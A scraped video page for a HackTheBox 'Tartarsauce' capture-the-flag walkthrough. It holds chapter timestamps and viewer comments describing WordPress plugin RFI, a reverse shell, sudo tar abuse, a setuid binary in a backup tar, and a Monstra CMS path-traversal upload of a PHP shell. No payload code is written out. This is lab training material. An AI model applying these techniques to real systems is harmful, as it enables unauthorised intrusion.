HackTheBox - Tartarsauce
Рет қаралды 30,046
5 жыл бұрын01:10 - Begin of recon
03:00 - Discovery of Wordpress and fixing broken links with burp
06:50 - Start of WPScan
07:14 - Start of poking at Monstra, (Rabbit Hole)
13:05 - Back to looking at WPScan, Find Gwolle Plugin is vulnerable to RFI Exploits
16:30 - Reverse shell returned as www-data
18:08 - Confirming monstra was read-only
18:50 - Running LinEnum.sh to see www-data can run tar via sudo
20:30 - Use GTFOBins to find a way to execute code with Tar
22:00 - Begin of Onuma user, use LinEnum again to see SystemD Timer of a custom script
24:10 - Examining backuperer script
26:00 - Hunting for vulnerabilities in Backuperer
32:15 - Playing with If/Then exit codes in Bash. Tuns out exit(0/1) evaluate as True, 2 is false
34:20 - Begin of exploiting the backuperer service by exploiting intregrity check
36:40 - Creating our 32-bit setuid binary
39:16 - Replacing backup tar, with our malicious one. (File Owner of Shell is wrong)
40:54 - Explaning file owners are embedded within Tar, creating tar on our local box so we can have the SetUID File owned by root
42:30 - Exploiting the Backuperer Service via SetUID!
45:00 - Unintended Exploit: Using SymLinks to read files via backuperer service
@SeattleGenXDude 4 жыл бұрын
The gobuster syntax has changed...gets me every time
@juancarlosmartinezhernande7777 6 ай бұрын
try feroxbuster, it is better
@systemSHK 4 жыл бұрын
Thanks Ippsec, great video. Fantastic box and I learned so much.
@davehouser1 3 жыл бұрын
Wow 17:30 - 18:05. I never knew you could set stty (to get tab complete, also support watch) + setting terminal evn var (to clear, backspace, and use up history commands). This is great. I have been using rlwrap for a while, which is a quick way to be able to do everything that your use of stty does, BUT I could never tab complete. This rules! BTW I tested to see if rlwrap would work with stty, it does not. Your tmux window will go on the fritz.. You must perform a plain ol' nc -nlvp, without rlwrap to utilize stty properly. Also note, if you do use stty with tmux, your pane size matters. Try not to adjust the size too much. Lastly to actually exit the nc session with stty enabled I had to reset my tmux pane. Just some caveats I wanted to share. Thanks for sharing this! :D
@Seferan 4 жыл бұрын
If you're struggling to get WPScan to show the plugins, I believe its due to WPScan changes here: blog.wpscan.org/wpscan/deprecation/2019/11/25/old-wpscan-deprecation.html. I updated my WPScan (gem install wpscan) to 3.7.7, signed up for an API-Key and ran the command: wpscan --url 10.10.10.88/webservices/wp -e p --api-token --plugins-detection aggressive . I'm not sure if update was required (or maybe just the plugin-detection setting) but this worked for me.
@billy-cg1qq 5 жыл бұрын
I love this box and your content continue : -)
@theedmbrewery6234 5 жыл бұрын
doing this box right now. Very thankful to you.
@supersteve6772 Жыл бұрын
Absolutely stellar explanation!
@mrblackhat616 5 жыл бұрын
awesome video as always
@robokopi00 5 жыл бұрын
Liked & subscribed. Great content 👌🏼
@haanrey 3 жыл бұрын
Does OSCP exam has boxes like this ? :O like the priv esc part ?!
@johntaylor1036 3 жыл бұрын
I too would like to know.
@TsukiCTF 5 жыл бұрын
one of my favorite box
@theedmbrewery6234 5 жыл бұрын
13.23 , you can see there is a readme file location just above the highlighted line, which says that the version was changed from 1.5.3 to 2.3.10 to trick wpscan and thats what gives away the actual version of this plugin.
@RohanOnBike 5 жыл бұрын
I was waiting for this for a long time. Had user, but couldnt get root. Wasn't able to exploit it in that 30 sec. Window.
@TheIronpusher 5 жыл бұрын
Ipp! Thank you for the videos they are great help and motivation while working on my OSCP. I have a question as unfortunately I have no connections in the field. How much different is your methodology and approach while on an actual pen test?
@ippsec 5 жыл бұрын
They are pretty different. If you want to see what a traditional pentest is like check out Rastalabs or Offshore. A lot less bug hunting and a lot more lateral movement and hunting for interesting things. The easiest way I can explain it is imagine you’re on a sports team. Your practice isn’t just grinding out games. It’s a bunch of small drills to focus on specific mechanics that help improve your overall skill. These machines are drills. Not direct 1:1 but when hiring I’d prefer a junior that does CTFs, over a senior pentester that does not. Primarily because i enjoy working with people who enjoy solving puzzles and arent in it for the money. Not saying people who don’t do CTFs are in it for the money, just a probability thing.
@chenxiaogeng2283 5 жыл бұрын
Great video! I was stuck at last part and try to figure out what can I do for diff command. Thank you IppSec.
@StrikerGoutham 5 жыл бұрын
Got the box by unintended priv esc!was waiting for proper priv esc , Now I can sleep in peace :p
@mrinaljaiswal3251 5 жыл бұрын
Hey ippsec, can you please do some video on most common privesc methods and using burpsuite to do blindsql injection(no automated scanner)?
@gw2955 3 жыл бұрын
This is nice, but for the OSCP can we use wpscan and priv esc? I know not everyone watching is doing OSCP but I just had that question.
@gracereigns 5 жыл бұрын
I've used tail to check logs, burp to check HTTP headers and payload looks ok, but I keep on connecting to myself when invoke "wp-load.php"
@gracereigns 5 жыл бұрын
I have updated my "wp-load.php" host and port accordingly but for some reason I keep on connecting to myself :(
@gracereigns 5 жыл бұрын
on 16:22 how did you partition your terminal into 3 segments? I use terminal daily I always wanted to do it that way.
@ippsec 5 жыл бұрын
look at my tmux video
@gracereigns 5 жыл бұрын
@@ippsec thank you for prompt reply.
@gracereigns 5 жыл бұрын
after debugging my script for a while I noticed that php get executed into my machine used python simpleHTTP
@skyone9237 5 жыл бұрын
Can someone suggest any videos or books to learn priv esc.
@beastface5123 5 жыл бұрын
www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
@divyarajsinhketansinhmahid65 2 жыл бұрын
The new wpscan does not scan for the plugins, is it strange that after update tools get worse?
@wenhui183 2 жыл бұрын
change the scan mode: --plugins-detection aggressive or mixed
@tan6347 2 жыл бұрын
Check the man page if you don’t know how to use the command.
@einfallstoll 5 жыл бұрын
I used a Path Traversal Vulnerability to upload a PHP Reverse Shell to the parent directory of Monstra using the file uploader. I didn't even look at the WordPress because I thought it was a rabbit hole ;)
@NomanRiffat 5 жыл бұрын
I would like to know how you did it? Since there wasn't any write permission for apache user in web root directory so how you uploaded file? The WP plugin RFI vulnerability also didn't upload the file itself but executed code remotely.
@marcogenovese532 5 жыл бұрын
@@NomanRiffat Same, I also tried path traversal to wp-content (hoping it would be writable) but since there were no write permissions for www-data I couldn't do it.
@einfallstoll 5 жыл бұрын
There is a file uploader in Monstra. You could set the upload path in the GET parameter to the parent directory. To do this you had to bypass the insufficient security mechanism that should've prevented that. Here's my advisory to this: www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2018-027_monstra_cms.txt
@rtrvlogs582 4 жыл бұрын
I thought of doing that, but don't know which dir to write, but after seeing your comment again dig up, pretty nice way to get shell 👍
@wutangdaug 4 жыл бұрын
Hi there. Can you tell me how you manage to using Google to find this particular vulnerabilities? I can't seem to find it, trying to sharp my google-fu as well if you don't mind sharing!
@gracereigns 5 жыл бұрын
I will check my apache logs to see if script gets execute on the victim machine :(
@NimbleSF 8 ай бұрын
This box was literally hell I wanted to die the whole time I was doing it
@RashadPrince 5 жыл бұрын
Being all over the place is fine right? I mean, that's how it is in the real world the correct?
@kristibegaj608 5 жыл бұрын
Im a big fan but the RFI was lame honestly!! Momstra has a LFI that is lit and u just passed the git issues of bug report and didn't see the most important one that lets u go back to a writeable dir to upload the file with php7 extension.. thats how I did it !
@ippsec 5 жыл бұрын
Nice! Completely missed that, background recon finished too quickly and i stopped looking at it.
@kristibegaj608 5 жыл бұрын
@@ippsec and I also missed the WordPress way because I found that way of monstra easier and faster but still is file inclusion either way 😅 Respect for you man I really like the way you do things. 👏👏
@Tea20024 2 ай бұрын
You copy the Pleasesubscribe file and make the tar.gz folder and copy it into the hash file which the script makes. But when the script performs an integrity check , wont that check fail ? since the victim machines orignal /var/www/html folder wont have the PleaseSubscribe file ? and when it fails the script deletes the files it created in the /var/tmp folder.
Odin Official
Рет қаралды 742